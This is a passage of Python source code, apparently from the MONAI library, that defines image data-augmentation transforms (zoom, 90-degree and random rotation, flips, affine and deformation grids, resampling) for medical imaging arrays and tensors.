img: NdarrayOrTensor,
mode: Optional[Union[InterpolateMode, str]] = None,
padding_mode: Optional[Union[NumpyPadMode, PytorchPadMode, str]] = None,
align_corners: Optional[bool] = None,
) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape: (num_channels, H[, W, ..., ]).
mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
The interpolation mode. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
padding_mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``,
``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``}
available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}.
One of the listed string values or a user supplied function. Defaults to ``"constant"``.
The mode to pad data after zooming.
See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html
https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html
align_corners: This only has an effect when mode is
'linear', 'bilinear', 'bicubic' or 'trilinear'. Defaults to ``self.align_corners``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
"""
img_t, *_ = convert_data_type(img, torch.Tensor, dtype=torch.float32)
_zoom = ensure_tuple_rep(self.zoom, img.ndim - 1) # match the spatial image dim
zoomed: NdarrayOrTensor = torch.nn.functional.interpolate( # type: ignore
recompute_scale_factor=True,
input=img_t.unsqueeze(0),
scale_factor=list(_zoom),
mode=look_up_option(self.mode if mode is None else mode, InterpolateMode).value,
align_corners=self.align_corners if align_corners is None else align_corners,
)
zoomed = zoomed.squeeze(0)
if self.keep_size and not np.allclose(img_t.shape, zoomed.shape):
pad_vec = [(0, 0)] * len(img_t.shape)
slice_vec = [slice(None)] * len(img_t.shape)
for idx, (od, zd) in enumerate(zip(img_t.shape, zoomed.shape)):
diff = od - zd
half = abs(diff) // 2
if diff > 0: # need padding
pad_vec[idx] = (half, diff - half)
elif diff < 0: # need slicing
slice_vec[idx] = slice(half, half + od)
padder = Pad(pad_vec, padding_mode or self.padding_mode)
zoomed = padder(zoomed)
zoomed = zoomed[tuple(slice_vec)]
out, *_ = convert_to_dst_type(zoomed, dst=img)
return out
class Rotate90(Transform):
"""
Rotate an array by 90 degrees in the plane specified by `axes`.
See np.rot90 for additional details:
https://numpy.org/doc/stable/reference/generated/numpy.rot90.html.
"""
backend = [TransformBackends.TORCH, TransformBackends.NUMPY]
def __init__(self, k: int = 1, spatial_axes: Tuple[int, int] = (0, 1)) -> None:
"""
Args:
k: number of times to rotate by 90 degrees.
spatial_axes: 2 int numbers, defines the plane to rotate with 2 spatial axes.
Default: (0, 1), this is the first two axis in spatial dimensions.
If axis is negative it counts from the last to the first axis.
"""
self.k = k
spatial_axes_: Tuple[int, int] = ensure_tuple(spatial_axes) # type: ignore
if len(spatial_axes_) != 2:
raise ValueError("spatial_axes must be 2 int numbers to indicate the axes to rotate 90 degrees.")
self.spatial_axes = spatial_axes_
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
"""
rot90: Callable = torch.rot90 if isinstance(img, torch.Tensor) else np.rot90 # type: ignore
out: NdarrayOrTensor = rot90(img, self.k, map_spatial_axes(img.ndim, self.spatial_axes))
out, *_ = convert_data_type(out, dtype=img.dtype)
return out
class RandRotate90(RandomizableTransform):
"""
With probability `prob`, input arrays are rotated by 90 degrees
in the plane specified by `spatial_axes`.
"""
backend = Rotate90.backend
def __init__(self, prob: float = 0.1, max_k: int = 3, spatial_axes: Tuple[int, int] = (0, 1)) -> None:
"""
Args:
prob: probability of rotating.
(Default 0.1, with 10% probability it returns a rotated array)
max_k: number of rotations will be sampled from `np.random.randint(max_k) + 1`, (Default 3).
spatial_axes: 2 int numbers, defines the plane to rotate with 2 spatial axes.
Default: (0, 1), this is the first two axis in spatial dimensions.
"""
RandomizableTransform.__init__(self, prob)
self.max_k = max_k
self.spatial_axes = spatial_axes
self._rand_k = 0
def randomize(self, data: Optional[Any] = None) -> None:
super().randomize(None)
if not self._do_transform:
return None
self._rand_k = self.R.randint(self.max_k) + 1
def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
randomize: whether to execute `randomize()` function first, default to True.
"""
if randomize:
self.randomize()
if not self._do_transform:
return img
return Rotate90(self._rand_k, self.spatial_axes)(img)
class RandRotate(RandomizableTransform):
"""
Randomly rotate the input arrays.
Args:
range_x: Range of rotation angle in radians in the plane defined by the first and second axes.
If single number, angle is uniformly sampled from (-range_x, range_x).
range_y: Range of rotation angle in radians in the plane defined by the first and third axes.
If single number, angle is uniformly sampled from (-range_y, range_y).
range_z: Range of rotation angle in radians in the plane defined by the second and third axes.
If single number, angle is uniformly sampled from (-range_z, range_z).
prob: Probability of rotation.
keep_size: If it is False, the output shape is adapted so that the
input array is contained completely in the output.
If it is True, the output shape is the same as the input. Default is True.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Defaults to False.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``np.float32``.
If None, use the data type of input data. To be compatible with other modules,
the output data type is always ``np.float32``.
"""
backend = Rotate.backend
def __init__(
self,
range_x: Union[Tuple[float, float], float] = 0.0,
range_y: Union[Tuple[float, float], float] = 0.0,
range_z: Union[Tuple[float, float], float] = 0.0,
prob: float = 0.1,
keep_size: bool = True,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
align_corners: bool = False,
dtype: Union[DtypeLike, torch.dtype] = np.float32,
) -> None:
RandomizableTransform.__init__(self, prob)
self.range_x = ensure_tuple(range_x)
if len(self.range_x) == 1:
self.range_x = tuple(sorted([-self.range_x[0], self.range_x[0]]))
self.range_y = ensure_tuple(range_y)
if len(self.range_y) == 1:
self.range_y = tuple(sorted([-self.range_y[0], self.range_y[0]]))
self.range_z = ensure_tuple(range_z)
if len(self.range_z) == 1:
self.range_z = tuple(sorted([-self.range_z[0], self.range_z[0]]))
self.keep_size = keep_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
self.align_corners = align_corners
self.dtype = dtype
self.x = 0.0
self.y = 0.0
self.z = 0.0
def randomize(self, data: Optional[Any] = None) -> None:
super().randomize(None)
if not self._do_transform:
return None
self.x = self.R.uniform(low=self.range_x[0], high=self.range_x[1])
self.y = self.R.uniform(low=self.range_y[0], high=self.range_y[1])
self.z = self.R.uniform(low=self.range_z[0], high=self.range_z[1])
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
align_corners: Optional[bool] = None,
dtype: Union[DtypeLike, torch.dtype] = None,
randomize: bool = True,
get_matrix: bool = False,
):
"""
Args:
img: channel first array, must have shape 2D: (nchannels, H, W), or 3D: (nchannels, H, W, D).
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``self.padding_mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
align_corners: Defaults to ``self.align_corners``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``self.dtype``.
If None, use the data type of input data. To be compatible with other modules,
the output data type is always ``np.float32``.
randomize: whether to execute `randomize()` function first, default to True.
get_matrix: whether to return the rotated image and rotate matrix together, default to False.
"""
if randomize:
self.randomize()
if not self._do_transform:
return img
rotator = Rotate(
angle=self.x if img.ndim == 3 else (self.x, self.y, self.z),
keep_size=self.keep_size,
mode=look_up_option(mode or self.mode, GridSampleMode),
padding_mode=look_up_option(padding_mode or self.padding_mode, GridSamplePadMode),
align_corners=self.align_corners if align_corners is None else align_corners,
dtype=dtype or self.dtype or img.dtype,
)
img = rotator(img)
return (img, rotator.get_rotation_matrix()) if get_matrix else img
class RandFlip(RandomizableTransform):
"""
Randomly flips the image along axes. Preserves shape.
See numpy.flip for additional details.
https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html
Args:
prob: Probability of flipping.
spatial_axis: Spatial axes along which to flip over. Default is None.
"""
backend = Flip.backend
def __init__(self, prob: float = 0.1, spatial_axis: Optional[Union[Sequence[int], int]] = None) -> None:
RandomizableTransform.__init__(self, prob)
self.flipper = Flip(spatial_axis=spatial_axis)
def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
randomize: whether to execute `randomize()` function first, default to True.
"""
if randomize:
self.randomize(None)
if not self._do_transform:
return img
return self.flipper(img)
class RandAxisFlip(RandomizableTransform):
"""
Randomly select a spatial axis and flip along it.
See numpy.flip for additional details.
https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html
Args:
prob: Probability of flipping.
"""
backend = Flip.backend
def __init__(self, prob: float = 0.1) -> None:
RandomizableTransform.__init__(self, prob)
self._axis: Optional[int] = None
def randomize(self, data: NdarrayOrTensor) -> None:
super().randomize(None)
if not self._do_transform:
return None
self._axis = self.R.randint(data.ndim - 1)
def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
randomize: whether to execute `randomize()` function first, default to True.
"""
if randomize:
self.randomize(data=img)
if not self._do_transform:
return img
return Flip(spatial_axis=self._axis)(img)
class RandZoom(RandomizableTransform):
"""
Randomly zooms input arrays with given probability within given zoom range.
Args:
prob: Probability of zooming.
min_zoom: Min zoom factor. Can be float or sequence same size as image.
If a float, select a random factor from `[min_zoom, max_zoom]` then apply to all spatial dims
to keep the original spatial shape ratio.
If a sequence, min_zoom should contain one value for each spatial axis.
If 2 values provided for 3D data, use the first value for both H & W dims to keep the same zoom ratio.
max_zoom: Max zoom factor. Can be float or sequence same size as image.
If a float, select a random factor from `[min_zoom, max_zoom]` then apply to all spatial dims
to keep the original spatial shape ratio.
If a sequence, max_zoom should contain one value for each spatial axis.
If 2 values provided for 3D data, use the first value for both H & W dims to keep the same zoom ratio.
mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
The interpolation mode. Defaults to ``"area"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
padding_mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``,
``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``}
available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}.
One of the listed string values or a user supplied function. Defaults to ``"constant"``.
The mode to pad data after zooming.
See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html
https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html
align_corners: This only has an effect when mode is
'linear', 'bilinear', 'bicubic' or 'trilinear'. Default: None.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
keep_size: Should keep original size (pad if needed), default is True.
kwargs: other arguments for the `np.pad` or `torch.pad` function.
note that `np.pad` treats channel dimension as the first dimension.
"""
backend = Zoom.backend
def __init__(
self,
prob: float = 0.1,
min_zoom: Union[Sequence[float], float] = 0.9,
max_zoom: Union[Sequence[float], float] = 1.1,
mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
padding_mode: Union[NumpyPadMode, PytorchPadMode, str] = NumpyPadMode.EDGE,
align_corners: Optional[bool] = None,
keep_size: bool = True,
**kwargs,
) -> None:
RandomizableTransform.__init__(self, prob)
self.min_zoom = ensure_tuple(min_zoom)
self.max_zoom = ensure_tuple(max_zoom)
if len(self.min_zoom) != len(self.max_zoom):
raise AssertionError("min_zoom and max_zoom must have same length.")
self.mode: InterpolateMode = look_up_option(mode, InterpolateMode)
self.padding_mode = padding_mode
self.align_corners = align_corners
self.keep_size = keep_size
self.kwargs = kwargs
self._zoom: Sequence[float] = [1.0]
def randomize(self, img: NdarrayOrTensor) -> None:
super().randomize(None)
if not self._do_transform:
return None
self._zoom = [self.R.uniform(l, h) for l, h in zip(self.min_zoom, self.max_zoom)]
if len(self._zoom) == 1:
# to keep the spatial shape ratio, use same random zoom factor for all dims
self._zoom = ensure_tuple_rep(self._zoom[0], img.ndim - 1)
elif len(self._zoom) == 2 and img.ndim > 3:
# if 2 zoom factors provided for 3D data, use the first factor for H and W dims, second factor for D dim
self._zoom = ensure_tuple_rep(self._zoom[0], img.ndim - 2) + ensure_tuple(self._zoom[-1])
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[InterpolateMode, str]] = None,
padding_mode: Optional[Union[NumpyPadMode, PytorchPadMode, str]] = None,
align_corners: Optional[bool] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
"""
Args:
img: channel first array, must have shape 2D: (nchannels, H, W), or 3D: (nchannels, H, W, D).
mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
The interpolation mode. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
padding_mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``,
``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``}
available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}.
One of the listed string values or a user supplied function. Defaults to ``"constant"``.
The mode to pad data after zooming.
See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html
https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html
align_corners: This only has an effect when mode is
'linear', 'bilinear', 'bicubic' or 'trilinear'. Defaults to ``self.align_corners``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
randomize: whether to execute `randomize()` function first, default to True.
"""
# match the spatial image dim
if randomize:
self.randomize(img=img)
if not self._do_transform:
return img
return Zoom(
self._zoom,
keep_size=self.keep_size,
mode=look_up_option(mode or self.mode, InterpolateMode),
padding_mode=padding_mode or self.padding_mode,
align_corners=align_corners or self.align_corners,
**self.kwargs,
)(img)
class AffineGrid(Transform):
"""
Affine transforms on the coordinates.
Args:
rotate_params: a rotation angle in radians, a scalar for 2D image, a tuple of 3 floats for 3D.
Defaults to no rotation.
shear_params: shearing factors for affine matrix, take a 3D affine as example::
[
[1.0, params[0], params[1], 0.0],
[params[2], 1.0, params[3], 0.0],
[params[4], params[5], 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
]
a tuple of 2 floats for 2D, a tuple of 6 floats for 3D. Defaults to no shearing.
translate_params: a tuple of 2 floats for 2D, a tuple of 3 floats for 3D. Translation is in
pixel/voxel relative to the center of the input image. Defaults to no translation.
scale_params: scale factor for every spatial dims. a tuple of 2 floats for 2D,
a tuple of 3 floats for 3D. Defaults to `1.0`.
dtype: data type for the grid computation. Defaults to ``np.float32``.
If ``None``, use the data type of input data (if `grid` is provided).
device: device on which the tensor will be allocated, if a new grid is generated.
affine: If applied, ignore the params (`rotate_params`, etc.) and use the
supplied matrix. Should be square with each side = num of image spatial
dimensions + 1.
.. deprecated:: 0.6.0
``as_tensor_output`` is deprecated.
"""
backend = [TransformBackends.TORCH, TransformBackends.NUMPY]
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
rotate_params: Optional[Union[Sequence[float], float]] = None,
shear_params: Optional[Union[Sequence[float], float]] = None,
translate_params: Optional[Union[Sequence[float], float]] = None,
scale_params: Optional[Union[Sequence[float], float]] = None,
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
dtype: DtypeLike = np.float32,
affine: Optional[NdarrayOrTensor] = None,
) -> None:
self.rotate_params = rotate_params
self.shear_params = shear_params
self.translate_params = translate_params
self.scale_params = scale_params
self.device = device
self.dtype = dtype
self.affine = affine
def __call__(
self, spatial_size: Optional[Sequence[int]] = None, grid: Optional[NdarrayOrTensor] = None
) -> Tuple[NdarrayOrTensor, NdarrayOrTensor]:
"""
The grid can be initialized with a `spatial_size` parameter, or provided directly as `grid`.
Therefore, either `spatial_size` or `grid` must be provided.
When initialising from `spatial_size`, the backend "torch" will be used.
Args:
spatial_size: output grid size.
grid: grid to be transformed. Shape must be (3, H, W) for 2D or (4, H, W, D) for 3D.
Raises:
ValueError: When ``grid=None`` and ``spatial_size=None``. Incompatible values.
"""
if grid is None: # create grid from spatial_size
if spatial_size is None:
raise ValueError("Incompatible values: grid=None and spatial_size=None.")
grid = create_grid(spatial_size, device=self.device, backend="torch", dtype=self.dtype)
_b = TransformBackends.TORCH if isinstance(grid, torch.Tensor) else TransformBackends.NUMPY
_device = grid.device if isinstance(grid, torch.Tensor) else self.device
affine: NdarrayOrTensor
if self.affine is None:
spatial_dims = len(grid.shape) - 1
affine = (
torch.eye(spatial_dims + 1, device=_device)
if _b == TransformBackends.TORCH
else np.eye(spatial_dims + 1)
)
if self.rotate_params:
affine = affine @ create_rotate(spatial_dims, self.rotate_params, device=_device, backend=_b)
if self.shear_params:
affine = affine @ create_shear(spatial_dims, self.shear_params, device=_device, backend=_b)
if self.translate_params:
affine = affine @ create_translate(spatial_dims, self.translate_params, device=_device, backend=_b)
if self.scale_params:
affine = affine @ create_scale(spatial_dims, self.scale_params, device=_device, backend=_b)
else:
affine = self.affine
grid, *_ = convert_data_type(grid, torch.Tensor, device=_device, dtype=self.dtype or grid.dtype)
affine, *_ = convert_to_dst_type(affine, grid)
grid = (affine @ grid.reshape((grid.shape[0], -1))).reshape([-1] + list(grid.shape[1:]))
return grid, affine
class RandAffineGrid(Randomizable, Transform):
"""
Generate randomised affine grid.
"""
backend = AffineGrid.backend
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
rotate_range: RandRange = None,
shear_range: RandRange = None,
translate_range: RandRange = None,
scale_range: RandRange = None,
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
) -> None:
"""
Args:
rotate_range: angle range in radians. If element `i` is a pair of (min, max) values, then
`uniform[-rotate_range[i][0], rotate_range[i][1])` will be used to generate the rotation parameter
for the `i`th spatial dimension. If not, `uniform[-rotate_range[i], rotate_range[i])` will be used.
This can be altered on a per-dimension basis. E.g., `((0,3), 1, ...)`: for dim0, rotation will be
in range `[0, 3]`, and for dim1 `[-1, 1]` will be used. Setting a single value will use `[-x, x]`
for dim0 and nothing for the remaining dimensions.
shear_range: shear range with format matching `rotate_range`, it defines the range to randomly select
shearing factors(a tuple of 2 floats for 2D, a tuple of 6 floats for 3D) for affine matrix,
take a 3D affine as example::
[
[1.0, params[0], params[1], 0.0],
[params[2], 1.0, params[3], 0.0],
[params[4], params[5], 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
]
translate_range: translate range with format matching `rotate_range`, it defines the range to randomly
select voxels to translate for every spatial dims.
scale_range: scaling range with format matching `rotate_range`. it defines the range to randomly select
the scale factor to translate for every spatial dims. A value of 1.0 is added to the result.
This allows 0 to correspond to no change (i.e., a scaling of 1.0).
device: device to store the output grid data.
See also:
- :py:meth:`monai.transforms.utils.create_rotate`
- :py:meth:`monai.transforms.utils.create_shear`
- :py:meth:`monai.transforms.utils.create_translate`
- :py:meth:`monai.transforms.utils.create_scale`
.. deprecated:: 0.6.0
``as_tensor_output`` is deprecated.
"""
self.rotate_range = ensure_tuple(rotate_range)
self.shear_range = ensure_tuple(shear_range)
self.translate_range = ensure_tuple(translate_range)
self.scale_range = ensure_tuple(scale_range)
self.rotate_params: Optional[List[float]] = None
self.shear_params: Optional[List[float]] = None
self.translate_params: Optional[List[float]] = None
self.scale_params: Optional[List[float]] = None
self.device = device
self.affine: Optional[NdarrayOrTensor] = None
def _get_rand_param(self, param_range, add_scalar: float = 0.0):
out_param = []
for f in param_range:
if issequenceiterable(f):
if len(f) != 2:
raise ValueError("If giving range as [min,max], should only have two elements per dim.")
out_param.append(self.R.uniform(f[0], f[1]) + add_scalar)
elif f is not None:
out_param.append(self.R.uniform(-f, f) + add_scalar)
return out_param
def randomize(self, data: Optional[Any] = None) -> None:
self.rotate_params = self._get_rand_param(self.rotate_range)
self.shear_params = self._get_rand_param(self.shear_range)
self.translate_params = self._get_rand_param(self.translate_range)
self.scale_params = self._get_rand_param(self.scale_range, 1.0)
def __call__(
self, spatial_size: Optional[Sequence[int]] = None, grid: Optional[NdarrayOrTensor] = None
) -> NdarrayOrTensor:
"""
Args:
spatial_size: output grid size.
grid: grid to be transformed. Shape must be (3, H, W) for 2D or (4, H, W, D) for 3D.
Returns:
a 2D (3xHxW) or 3D (4xHxWxD) grid.
"""
self.randomize()
affine_grid = AffineGrid(
rotate_params=self.rotate_params,
shear_params=self.shear_params,
translate_params=self.translate_params,
scale_params=self.scale_params,
device=self.device,
)
_grid: NdarrayOrTensor
_grid, self.affine = affine_grid(spatial_size, grid)
return _grid
def get_transformation_matrix(self) -> Optional[NdarrayOrTensor]:
"""Get the most recently applied transformation matrix"""
return self.affine
class RandDeformGrid(Randomizable, Transform):
"""
Generate random deformation grid.
"""
backend = [TransformBackends.TORCH]
def __init__(
self,
spacing: Union[Sequence[float], float],
magnitude_range: Tuple[float, float],
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
) -> None:
"""
Args:
spacing: spacing of the grid in 2D or 3D.
e.g., spacing=(1, 1) indicates pixel-wise deformation in 2D,
spacing=(1, 1, 1) indicates voxel-wise deformation in 3D,
spacing=(2, 2) indicates deformation field defined on every other pixel in 2D.
magnitude_range: the random offsets will be generated from
`uniform[magnitude[0], magnitude[1])`.
as_tensor_output: whether to output tensor instead of numpy array.
defaults to True.
device: device to store the output grid data.
"""
self.spacing = spacing
self.magnitude = magnitude_range
self.rand_mag = 1.0
self.as_tensor_output = as_tensor_output
self.random_offset: np.ndarray
self.device = device
def randomize(self, grid_size: Sequence[int]) -> None:
self.random_offset = self.R.normal(size=([len(grid_size)] + list(grid_size))).astype(np.float32, copy=False)
self.rand_mag = self.R.uniform(self.magnitude[0], self.magnitude[1])
def __call__(self, spatial_size: Sequence[int]):
"""
Args:
spatial_size: spatial size of the grid.
"""
self.spacing = fall_back_tuple(self.spacing, (1.0,) * len(spatial_size))
control_grid = create_control_grid(spatial_size, self.spacing, device=self.device, backend="torch")
self.randomize(control_grid.shape[1:])
_offset, *_ = convert_to_dst_type(self.rand_mag * self.random_offset, control_grid)
control_grid[: len(spatial_size)] += _offset
if not self.as_tensor_output:
control_grid, *_ = convert_data_type(control_grid, output_type=np.ndarray, dtype=np.float32)
return control_grid
class Resample(Transform):
backend = [TransformBackends.TORCH]
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
as_tensor_output: bool = True,
norm_coords: bool = True,
device: Optional[torch.device] = None,
dtype: DtypeLike = np.float64,
) -> None:
"""
computes output image using values from `img`, locations from `grid` using pytorch.
supports spatially 2D or 3D (num_channels, H, W[, D]).
Args:
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
When `USE_COMPILED` is `True`, this argument uses
``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
See also: https://docs.monai.io/en/stable/networks.html#grid-pull
norm_coords: whether to normalize the coordinates from `[-(size-1)/2, (size-1)/2]` to
`[0, size - 1]` (for ``monai/csrc`` implementation) or
`[-1, 1]` (for torch ``grid_sample`` implementation) to be compatible with the underlying
resampling API.
device: device on which the tensor will be allocated.
dtype: data type for resampling computation. Defaults to ``np.float64`` for best precision.
If ``None``, use the data type of input data. To be compatible with other modules,
the output data type is always `float32`.
.. deprecated:: 0.6.0
``as_tensor_output`` is deprecated.
"""
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
self.norm_coords = norm_coords
self.device = device
self.dtype = dtype
def __call__(
self,
img: NdarrayOrTensor,
grid: Optional[NdarrayOrTensor] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
dtype: DtypeLike = None,
) -> NdarrayOrTensor:
"""
Args:
img: shape must be (num_channels, H, W[, D]).
grid: shape must be (3, H, W) for 2D or (4, H, W, D) for 3D.
if ``norm_coords`` is True, the grid values must be in `[-(size-1)/2, (size-1)/2]`.
if ``USE_COMPILED=True`` and ``norm_coords=False``, grid values must be in `[0, size-1]`.
if ``USE_COMPILED=False`` and ``norm_coords=False``, grid values must be in `[-1, 1]`.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
When `USE_COMPILED` is `True`, this argument uses
``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
See also: https://docs.monai.io/en/stable/networks.html#grid-pull
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``self.padding_mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
dtype: data type for resampling computation. Defaults to ``self.dtype``.
To be compatible with other modules, the output data type is always `float32`.
See also:
:py:const:`monai.config.USE_COMPILED`
"""
if grid is None:
raise ValueError("Unknown grid.")
_device = img.device if isinstance(img, torch.Tensor) else self.device
_dtype = dtype or self.dtype or img.dtype
img_t, *_ = convert_data_type(img, torch.Tensor, device=_device, dtype=_dtype)
grid_t = convert_to_dst_type(grid, img_t)[0]
if grid_t is grid: # copy if needed (convert_data_type converts to contiguous)
grid_t = grid_t.clone(memory_format=torch.contiguous_format)
sr = min(len(img_t.shape[1:]), 3)
if USE_COMPILED:
if self.norm_coords:
for i, dim in enumerate(img_t.shape[1 : 1 + sr]):
grid_t[i] = (max(dim, 2) / 2.0 - 0.5 + grid_t[i]) / grid_t[-1:]
grid_t = moveaxis(grid_t[:sr], 0, -1) # type: ignore
_padding_mode = self.padding_mode if padding_mode is None else padding_mode
_padding_mode = _padding_mode.value if isinstance(_padding_mode, GridSamplePadMode) else _padding_mode
bound = 1 if _padding_mode == "reflection" else _padding_mode
_interp_mode = self.mode if mode is None else mode
_interp_mode = _interp_mode.value if isinstance(_interp_mode, GridSampleMode) else _interp_mode
if _interp_mode == "bicubic":
interp = 3
elif _interp_mode == "bilinear":
interp = 1
else:
interp = _interp_mode # type: ignore
out = grid_pull(
img_t.unsqueeze(0), grid_t.unsqueeze(0), bound=bound, extrapolate=True, interpolation=interp
)[0]
else:
if self.norm_coords:
for i, dim in enumerate(img_t.shape[1 : 1 + sr]):
grid_t[i] = 2.0 / (max(2, dim) - 1.0) * grid_t[i] / grid_t[-1:]
index_ordering: List[int] = list(range(sr - 1, -1, -1))
grid_t = moveaxis(grid_t[index_ordering], 0, -1) # type: ignore
out = torch.nn.functional.grid_sample(
img_t.unsqueeze(0),
grid_t.unsqueeze(0),
mode=self.mode.value if mode is None else GridSampleMode(mode).value,
padding_mode=self.padding_mode.value if padding_mode is None else GridSamplePadMode(padding_mode).value,
align_corners=True,
)[0]
out_val, *_ = convert_to_dst_type(out, dst=img, dtype=np.float32)
return out_val
class Affine(Transform):
"""
Transform ``img`` given the affine parameters.
A tutorial is available: https://github.com/Project-MONAI/tutorials/blob/0.6.0/modules/transforms_demo_2d.ipynb.
"""
backend = list(set(AffineGrid.backend) & set(Resample.backend))
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
rotate_params: Optional[Union[Sequence[float], float]] = None,
shear_params: Optional[Union[Sequence[float], float]] = None,
translate_params: Optional[Union[Sequence[float], float]] = None,
scale_params: Optional[Union[Sequence[float], float]] = None,
affine: Optional[NdarrayOrTensor] = None,
spatial_size: Optional[Union[Sequence[int], int]] = None,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
norm_coords: bool = True,
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
dtype: DtypeLike = np.float32,
image_only: bool = False,
) -> None:
"""
The affine transformations are applied in rotate, shear, translate, scale order.
Args:
rotate_params: a rotation angle in radians, a scalar for 2D image, a tuple of 3 floats for 3D.
Defaults to no rotation.
shear_params: shearing factors for affine matrix, take a 3D affine as example::
[
[1.0, params[0], params[1], 0.0],
[params[2], 1.0, params[3], 0.0],
[params[4], params[5], 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
]
